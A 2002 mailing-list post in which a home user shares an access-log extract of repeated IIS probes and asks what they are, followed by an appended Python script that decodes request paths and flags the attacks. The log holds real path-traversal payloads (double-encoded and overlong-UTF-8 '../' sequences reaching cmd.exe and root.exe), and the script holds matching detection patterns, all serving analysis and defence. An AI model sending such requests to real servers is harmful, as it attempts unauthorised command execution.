[plug] Anyone seen this particular attack pattern before?
Alan Graham
alan.graham at infonetsystems.com.au
Thu Jan 17 11:03:56 WST 2002
I've just set up a web server on my firewall, to show some photos of the
kids to my folks in England. Within a few days, I started seeing this
attack. It comes in regularly, from a lot of different IPs, and it's
obviously aimed at NT IIS. Ha. I'm thinking it's a well known scripted
attack, or possibly a zombied attack? There's a pause of about 5 minutes
between each attack. The pisser is that most of the hosts appear to be
within iinet. I suppose I'd better let them know too.
Can anyone tell me any more about it?
Extract of access_log
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
Regards
Alan Graham
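Added here as an example, not part of Alan's post: a small Python filter that decodes request paths from access_log lines of the shape shown above (repeated percent-decoding on bytes, so double-encoded and overlong UTF-8 sequences are visible) and flags the traversal, double-encoding and cmd.exe/root.exe indicators, which is what you would want before counting hits per source host or reporting them. The sample lines are constructed to mirror the extract's format (no client IP column), and every function and rule name is my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines modelled on the access_log extract in the post.
SAMPLE_LOG = """\
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
"GET /photos/kids/index.html HTTP/1.0" 200 1234 "-" "-"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"\s+(?P<status>\d{3})')

def decode_path(raw):
    """Drop the query string, then percent-decode until the path stops changing
    (max 3 rounds). Working on bytes keeps overlong UTF-8 like %c0%af as raw bytes."""
    data = raw.encode("latin-1", "replace").split(b"?", 1)[0]
    for _ in range(3):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data = nxt
    return data

def classify_request(line):
    """Return the raw path, status and a list of indicator names, or None if the
    line does not look like a request line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m.group("path")
    path = decode_path(raw)
    findings = []
    if re.search(rb"(cmd|root)\.exe", path, re.I):
        findings.append("command-interpreter request")
    if re.search(rb"\.\.[\\/]", path):            # ..\ or ../ after decoding
        findings.append("directory traversal")
    if re.search(rb"\.\.[\x80-\xff]", path):      # .. followed by a non-ASCII byte
        findings.append("malformed/overlong UTF-8 traversal")
    if "%25" in raw.lower() or "%%" in raw:      # percent sign itself was encoded
        findings.append("double percent-encoding")
    return {"path": raw, "status": int(m.group("status")), "findings": findings}

def scan_log(text):
    """Return only the requests that tripped at least one rule."""
    hits = [classify_request(l) for l in text.splitlines()]
    return [h for h in hits if h and h["findings"]]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["status"], hit["path"], "->", ", ".join(hit["findings"]))
```

Note that the rules fire on the decoded form, so a request that IIS would reject (the 400s above) and one it would have accepted both show up; the status column tells you which is which.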